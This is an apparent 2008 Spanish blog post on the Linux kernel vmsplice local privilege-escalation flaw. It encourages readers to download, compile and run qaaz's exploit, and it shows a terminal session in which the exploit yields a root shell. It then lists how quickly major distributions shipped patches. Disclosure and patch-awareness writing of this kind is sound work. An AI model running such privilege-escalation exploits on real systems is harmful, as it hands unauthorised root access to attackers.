Vulnerabilidad en Linux – Kernel 2.6.x – 2.6.24.1

Como muchos ya saben, se ha descubierto una grave vulnerabilidad en el kernel linux (2.6.x – 2.6.24.1) que permite a un usuario con acceso local obtener privilegios de root ejecutando un simple exploit.

Si queréis poder dedicar un minuto a jugar un poco con el exploit para comprobar por uno mismo si afecta a nuestra distribución. Para ello basta descargar el código fuente del exploit (y aquí otra variante), compilarlo y ejecutarlo como usuario normal. A continuacion las acciones:

zarpele@makid:~$ uname -r
2.6.22-3-686

zarpele@makid:~/Desktop$ gcc exploit.c -o exploit
zarpele@makid:~/Desktop$ whoami
zarpele
zarpele@makid:~/Desktop$ ./exploit
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7dd2000 .. 0xb7e04000
[+] root
root@makid:~/Desktop#

Casi tan pasmosa como la efectividad del exploit es la sencillez del parche que lo soluciona.
Ya hay nueva versión del kernel (2.6.24.2) con el bug resuelto.
Esto es importante ya que dispones de un ciber con este kernel cualquier usuario podria acceder como root y hacer lo que quiera!!!.

DistroWatch hace un resumen de la rapidez con que las principales distribuciones GNU/Linux respondieron publicando sus correcciones al problema. Todas las 10 primeras distribuciones reaccionaron en menos de 48 horas:

Distribution Date/Time Delay Reference
Debian GNU/Linux 2008-02-11 13:58 +0 hours DSA 1494-1
Fedora 2008-02-11 22:39 +8 hours FEDORA-2008-1423
Slackware Linux 2008-02-12 02:00 +12 hours SSA:2008-042-01
Mandriva Linux 2008-02-12 07:06 +19 hours MDVSA-2008:043
Frugalware Linux 2008-02-12 11:17 +21 hours FSA-369
openSUSE 2008-02-12 12:43 +23 hours SUSE-SA:2008:007
rPath Linux 2008-02-12 16:28 +26 hours rPSA-2008-0052-1
Red Hat Enterprise Linux 2008-02-12 16:54 +27 hours RHSA-2008:0129-01
Ubuntu 2008-02-12 17:23 +27 hours USN-577-1
CentOS 2008-02-13 03:27 +37 hours CESA-2008:0129

Saludos…

Fuente: DistroWatch, BraiaNet


Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Puedes dejar un comentario o enviar un trackback desde tu propio sitio.

Deja un comentario

XHTML: Puedes usar estas etiquetas: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="" escaped="">

 
Follow Me Hazte Fan Subscribe